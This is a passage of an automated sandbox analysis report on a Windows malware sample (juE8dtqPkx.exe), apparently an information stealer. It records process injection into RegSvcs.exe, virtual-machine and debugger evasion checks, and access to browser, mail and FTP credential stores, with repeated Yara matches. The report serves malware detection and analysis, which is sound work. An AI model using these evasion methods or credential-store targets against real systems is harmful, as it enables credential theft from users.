                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597307Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597150Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593813Jump to behavior
                  Source: RegSvcs.exe, 00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: RegSvcs.exe, 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vmware
                  Source: juE8dtqPkx.exe, 00000000.00000002.2183957596.0000000002E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe|
                  Source: RegSvcs.exe, 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: juE8dtqPkx.exe, 00000000.00000002.2183520013.0000000000ACE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-f2-00a0c91efb8b}\
                  Source: juE8dtqPkx.exe, 00000003.00000003.2183097615.0000000002EE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                  Source: RegSvcs.exe, 00000004.00000002.4677518558.00000000056E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeAPI call chain: ExitProcess graph end nodegraph_0-86760
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00A834B0 mov eax, dword ptr fs:[00000030h]0_2_00A834B0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00A83510 mov eax, dword ptr fs:[00000030h]0_2_00A83510
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00A81E70 mov eax, dword ptr fs:[00000030h]0_2_00A81E70
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_01683510 mov eax, dword ptr fs:[00000030h]3_2_01683510
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_016834B0 mov eax, dword ptr fs:[00000030h]3_2_016834B0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_01681E70 mov eax, dword ptr fs:[00000030h]3_2_01681E70
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0041F250 SetUnhandledExceptionFilter,3_2_0041F250
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041A208
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00417DAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004123F1 SetUnhandledExceptionFilter,4_2_004123F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DCE008Jump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                  Source: juE8dtqPkx.exeBinary or memory string: Shell_TrayWnd
                  Source: juE8dtqPkx.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,4_2_00417A20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: juE8dtqPkx.exe, 00000003.00000003.2182921899.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000002.2197183904.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2183097615.0000000002EE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4125570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4174790.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.54a0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.54a0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4125570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4174790.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d706c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5056, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4125570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4174790.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.54a0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.54a0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4125570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4174790.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d706c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: juE8dtqPkx.exeBinary or memory string: WIN_XP
                  Source: juE8dtqPkx.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                  Source: juE8dtqPkx.exeBinary or memory string: WIN_XPe
                  Source: juE8dtqPkx.exeBinary or memory string: WIN_VISTA
                  Source: juE8dtqPkx.exeBinary or memory string: WIN_7
                  Source: juE8dtqPkx.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4125570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4174790.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.54a0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.54a0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4125570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4174790.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d706c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5056, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4125570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPE
